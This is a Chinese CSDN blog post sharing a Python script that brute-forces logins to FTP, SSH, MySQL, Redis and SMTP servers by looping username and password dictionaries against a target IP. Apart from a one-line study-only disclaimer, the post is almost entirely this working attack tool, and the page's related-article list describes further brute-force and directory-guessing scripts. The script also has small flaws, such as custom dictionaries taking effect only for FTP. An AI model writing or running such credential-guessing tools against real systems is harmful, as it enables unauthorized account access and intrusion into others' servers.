python--协议库爆破-爆破工具的简单实现

最新推荐文章于 2024-07-11 19:45:38 发布
最新推荐文章于 2024-07-11 19:45:38 发布
阅读量203 收藏
点赞数 3
分类专栏: # 安全开发 文章标签: python adb 网络安全 安全 web安全 安全威胁分析 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/139889620
版权

免责声明:本文仅做技术交流与学习...

支持ftp,ssh,mysql,redis,email(SMTP)

使用时提前准备好字典.....

(未加多线程)

from ftplib import FTP
import paramiko
import pymysql
import redis
import smtplib
import os, sys


def ftp_check(ip, username, password):
    ftp = FTP()
    print('check->' + ip + '|' + username + '|' + password)
    try:
        ftp.connect(ip, 21)
        ftp.login(username, password)
        print('success')
        exit()
    except Exception as e:
        print('failed')


def ssh_check(ip, username, password):
    print('check->' + ip + '|' + username + '|' + password)
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(ip, "22", username, password)
        print('success')
        exit()
    except Exception as e:
        print('failed')


def mysql_check(ip, username, password):
    print('check->' + ip + '|' + username + '|' + password)
    try:
        conn_obj = pymysql.connect(
            host=ip,  # MySQL服务端的IP地址
            port=3306,  # MySQL默认PORT地址(端口号)
            user=username,  # 用户名
            password=password,  # 密码,也可以简写为passwd
            database='mysql',  # 库名称,也可以简写为db
            charset='utf8'  # 字符编码
        )
        print('success')
        exit()
    except Exception as e:
        pass


def redis_check(ip, password):
    print('check->' + ip + '|' + password)
    try:
        redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)
        redis_conn.set('test', 'xiaodi')
        print('success')
        exit()
    except Exception as e:
        pass


def email_check(ip, username, password):
    print('check->' + ip + '|' + username + '|' + password)
    try:
        smtpObj = smtplib.SMTP()
        smtpObj.connect('smtp.' + ip, 25)  # 25 为 SMTP 端口号
        smtpObj.login(username, password)
        print('ok')
        exit()
    except smtplib.SMTPException:
        print("Error")


if __name__ == '__main__':
    pypath = os.getcwd()
    print('eg:固定字典使用说明:')
    print('python all.py ftp 127.0.0.1')
    print('python all.py ssh 127.0.0.1')
    print('python all.py redis 127.0.0.1')
    print('python all.py mysql 127.0.0.1')
    print('python all.py email')
    print('eg:自定义字典使用说明:')
    print('python all.py ftp 127.0.0.1 user.txt pass.txt')
    print('python all.py ssh 127.0.0.1 user.txt pass.txt')
    print('python all.py redis 127.0.0.1 user.txt pass.txt')
    print('python all.py mysql 127.0.0.1 user.txt pass.txt')
    print('python all.py email user.txt pass.txt')
    xy = sys.argv[1]
    ip = sys.argv[2]
    zidian = sys.argv[3]
    zidian2 = sys.argv[4]

    # 没有设置自定义字典,采用固定字典
    if len(zidian) == 0:
        if xy == 'ftp':
            for username in open(pypath + '/conf/dic_username_ftp.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_ftp.txt'):
                    password = password.replace('\n', '')
                    ftp_check(ip, username, password)
        elif xy == 'ssh':
            for username in open(pypath + '/conf/dic_username_ssh.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_ssh.txt'):
                    password = password.replace('\n', '')
                    ssh_check(ip, username, password)
        elif xy == 'mysql':
            for username in open(pypath + '/conf/dic_username_mysql.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_mysql.txt'):
                    password = password.replace('\n', '')
                    mysql_check(ip, username, password)
        elif xy == 'redis':
            for password in open(pypath + '/conf/dic_password_redis.txt'):
                password = password.replace('\n', '')
                redis_check(ip, password)
        elif xy == 'email':
            for username in open(pypath + '/conf/dic_username_email.txt'):
                username = username.replace('\n', '')
                ip = username.split('@')[1]
                for password in open(pypath + '/conf/dic_password_email.txt'):
                    password = password.replace('\n', '')
                    email_check(ip, username, password)
    # 设置了自定义字典,自定义字典爆破(代码只修改的ftp)
    else:
        if xy == 'ftp':
            for username in open(pypath + '\\' + zidian):
                username = username.replace('\n', '')
                for password in open(pypath + '\\' + zidian2):
                    password = password.replace('\n', '')
                    ftp_check(ip, username, password)
        elif xy == 'ssh':
            for username in open(pypath + '/conf/dic_username_ssh.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_ssh.txt'):
                    password = password.replace('\n', '')
                    ssh_check(ip, username, password)
        elif xy == 'mysql':
            for username in open(pypath + '/conf/dic_username_mysql.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_mysql.txt'):
                    password = password.replace('\n', '')
                    mysql_check(ip, username, password)
        elif xy == 'redis':
            for password in open(pypath + '/conf/dic_password_redis.txt'):
                password = password.replace('\n', '')
                redis_check(ip, password)
        elif xy == 'email':
            for username in open(pypath + '/conf/dic_username_email.txt'):
                username = username.replace('\n', '')
                ip = username.split('@')[1]
                for password in open(pypath + '/conf/dic_password_email.txt'):
                    password = password.replace('\n', '')
                    email_check(ip, username, password)

金灰
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Python安全工具编写-密码爆破
beirry的博客
02-23 5204
密码爆破其实是将把可能为密码的字符串集合逐一验证,通过验证返回的结果来找到密码。 为了验证编写密码爆破工具的有效性,则用了DVWA靶场来验证。我们随意输入一串数字来看看返回的验证结果是如何。 可以看到,只要密码不正确则页面会显示Username and/or password incorrect. 那么根据这一特征,我们则可以利用密码爆破来编写爆破的框架了,首先我们确定我们爆破密码的必需品:1,模仿页面产生请求;2,密码尝试;3,获取返回页面特征 import requests def function_
3、安全开发-Python-协议爆破&FTP&SSH&Redis&MYSQL&SMTP等
m0_65842464的博客
02-04 2061
原理:python的一些支持FTP、SSH、Redis、SMTP、Mysql等协议远程登录,只需要知道该服务器ip和端口,然后用本机准备好的用户名字典和密码字典进行循环组合尝试爆破登录,其中字典的好坏决定成功的几率,可以尝试弱口令集和社工方式获取,当然也不一定能成功,这只是锄头,挖不挖的进取决于是什么地。
Python-密码爆破
weixin_57041250的博客
10-29 872
有密码的地方 均可使用爆破。但前提是登录无限制。
Python--弱口令字典爆破
qq_44468544的博客
09-18 2506
语言python 脚本名:burteForce.py 使用模块requests、sys 原理:通过对比登录失败与登录成功的差异性来判断是否成功 cms网站后台管理,登录成功后会重定向跳转到后台管理页面,此时bp抓包,响应行的状态码应该是302,通过对比登录失败与登录成功的状态码来进行字典爆破 注意:requests模块中post传参,需要传递 allow_redirects=False,意为传参后不进行跳转 源码: # burteForce.py import re...
使用 Python 编写密码爆破工具
CSDN
05-28 5140
有了FTP服务器的登录口令之后,可以进行测试该服务器是否提供Web服务,其中检测通过nlst()列出的每个文件的文件名是不是默认的Web页面文件名,并把找到的所有默认的网页都添加到retList数组中。在findTgts()函数中实现对整个网段的主机445端口的扫描,setupHandler()函数实现目标主机被攻击后进行远程交互的监听器的功能。需要先下载Pexpect:pip install pexpect 该工具只能在linux系统中使用,且可以登录ftp等,不局限于ssh。
密码爆破---绕过验证码进行登录爆破
04-14
密码爆破---绕过验证码进行登录爆破 ...绕过验证码进行登录爆破是一种复杂的技术,需要结合多种技术和工具实现。我们的实现原理基于 muggle_ocr ,使用 OCR 技术来识别验证码,并将其转换为文本。
Python-一款集http端口扫描和目录批量扫描为一体的自动化工具
08-10
同时,可以配合使用诸如dirb、fimap或Burp Suite等工具Python实现,进行更加智能的目录爆破,通过词典或模式匹配寻找潜在的暴露路径。 该自动化工具可能包含以下核心组件: 1. **端口扫描模块**:使用Python的...
实验2 Python信息搜集工具编写-linux的爆破器下载
04-09
华东交通大学 Python信息搜集工具编写-linux的爆破器下载 实验报告
根据指定hash值寻键爆破脚本(Python实现
08-22
代码说明 在所有可能的姓名+学号的字符串集合下,找到一个MD5散列值为"sdu_cst_20220610"的键。 通过不断构建随机姓+随机名+固定学号前缀+随机学号后缀组成的合法键进行MD5散列求值,与目标散列值比较,相等则求解...
CTF-PythonGUI-PNG图片高度爆破-用于CTF赛事中png高度修改的GUI程序
04-14
PNG图片高度爆破,由纯Python程序编写,主要GUI界面优PySimpleGUI编写,主要适用于CTFer,用于CTF比赛中的杂项类型,png高度修改的题目可以通过图形化界面运行,运行时间一般在10秒左右,运行完毕后将生成一个修改后...
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 1897
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
一键安装ros及出现问题的解决方案
m0_58173801的博客
07-10 478
catkin_make时出现报错如下。
java占位符替换五种方式
weixin_61478518的博客
07-08 443
在业务开发中,经常需要输出文本串。其中,部分场景下大部分文本内容是一样的,只有少部分点是不一样。简单做法是直接拼接字段,但是这会有个问题。后面如果想要修改内容,那么每个地方都要修改,这不符合设计模式中的开闭原则,面向应该对扩展开放,对修改关闭。如何解决这个问题?先来看现实生活中的例子,个人信息填写。一般会要填写表格,已经定义好了姓名,性别,年龄等字段,只要填写对应的个人信息就好了。在程序开发中,我们会预先定义好一个字符串模板,需要改动的点使用占位符。
Python进阶】函数的扩展
weixin_52854743的博客
07-06 981
python函数的补充,包括函数的嵌套调用、函数的变量作用域、多种参数、拆包和交换变量值、引用和匿名函数
制作爬取4399游戏名称软件
fasdaegaw的博客
07-06 367
请求头={'User-Agent':'Mozilla/5.0 (Windows NT 10.0;网站源代码=requests.get(url=链接,headers=请求头).text #发送请求并且拿到网站源代码。class属性的结果=初始化.find(class_="tm_list") #class是关键字。li标签内容=class属性的结果.find_all('li') #list。链接='https://www.4399.com/' #网站链接。#发送请求并且拿到源代码。
守望数据边界:sklearn中的离群点检测技术
2401_85742452的博客
07-08 686
本文的目的是帮助读者更好地理解离群点检测,并掌握在sklearn中实现这些技术的方法。通过本文,我们了解到了sklearn中不同的离群点检测技术,并提供了实际的代码示例。Isolation Forest是一种基于随机森林的离群点检测方法,它通过随机选择特征和切分点来“孤立”离群点。在实际应用中,离群点检测可以帮助我们识别数据集中的异常行为,从而进行进一步的分析或采取预防措施。评估离群点检测的效果通常比较困难,因为没有绝对的标准。基于密度的方法,如DBSCAN,根据数据点的密度而非固定阈值来识别离群点。
python拆分Excel数据,自动发邮箱
cc605523的博客
07-06 699
message['To'] = ",".join(recipient_email) # 收件人(可以添加多个,若只有一个收件人,可直接写邮箱号)"采购部": ['young@realstarie.com', "865193996@qq.com"], # 可以添加多个收件人。# split_Excel("年假情况.xlsx", "年假_按部门汇总")department_df = df[df["部门"] == dept]depts = ["采购部", "船务部"]
使用Gunicorn提高Web应用的多核并发处理能力
最新发布
2401_85639015的博客
07-11 703
Gunicorn 是一个基于pre-fork worker模型的WSGI服务器。它能够处理多个工作进程,每个进程可以处理多个请求,这使得它非常适合处理并发请求。兼容性强:支持多种Web框架,如Django、Flask、Pyramid等。高性能:基于pre-fork worker模型,能充分利用多核CPU。易于配置:提供了多种配置方式,包括命令行参数、配置文件和环境变量。稳定性:在生产环境中广泛使用,经过了大量的实践检验。
编程学单词:delta(希腊字母Δ/δ),差值表示
m0_57158496的博客
07-11 890
结语:代码编写中,用“通用”字符命名相应变量,是一个不错的好习惯。其一,不用注释,望文生义,简单明了;其二,代码书写形式风格“标准”统一,方便维护和流转。说明:今天我在堆叠代码时发现有delta样子的单词存在,修习之,对代码书写大有裨益。从今以后,我遇到类似的单词,都将在学习笔记中标识、分享。😋回页目录。
帮我写一个目录爆破工具脚本python
05-18
好的,以下是一个简单的目录爆破工具脚本Python代码: ```python import requests url = input("请输入目标网站URL: ") wordlist = input("请输入字典文件路径: ") with open(wordlist, "r") as f: for line in f: dir = line.strip() if not dir.startswith("/"): dir = "/" + dir target_url = url + dir response = requests.get(target_url) if response.status_code == 200: print("[+] 目录存在: " + target_url) elif response.status_code == 403: print("[!] 访问被拒绝: " + target_url) else: print("[-] 目录不存在: " + target_url) ``` 使用方法: 1. 运行脚本。 2. 输入目标网站URL和字典文件路径。 3. 脚本会逐行读取字典文件中的内容,拼接成目标URL进行访问。 4. 如果目录存在则输出 `[+] 目录存在: 目标URL`,如果访问被拒绝则输出 `[!] 访问被拒绝: 目标URL`,否则输出 `[-] 目录不存在: 目标URL`。 注意:仅供学习和研究使用,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值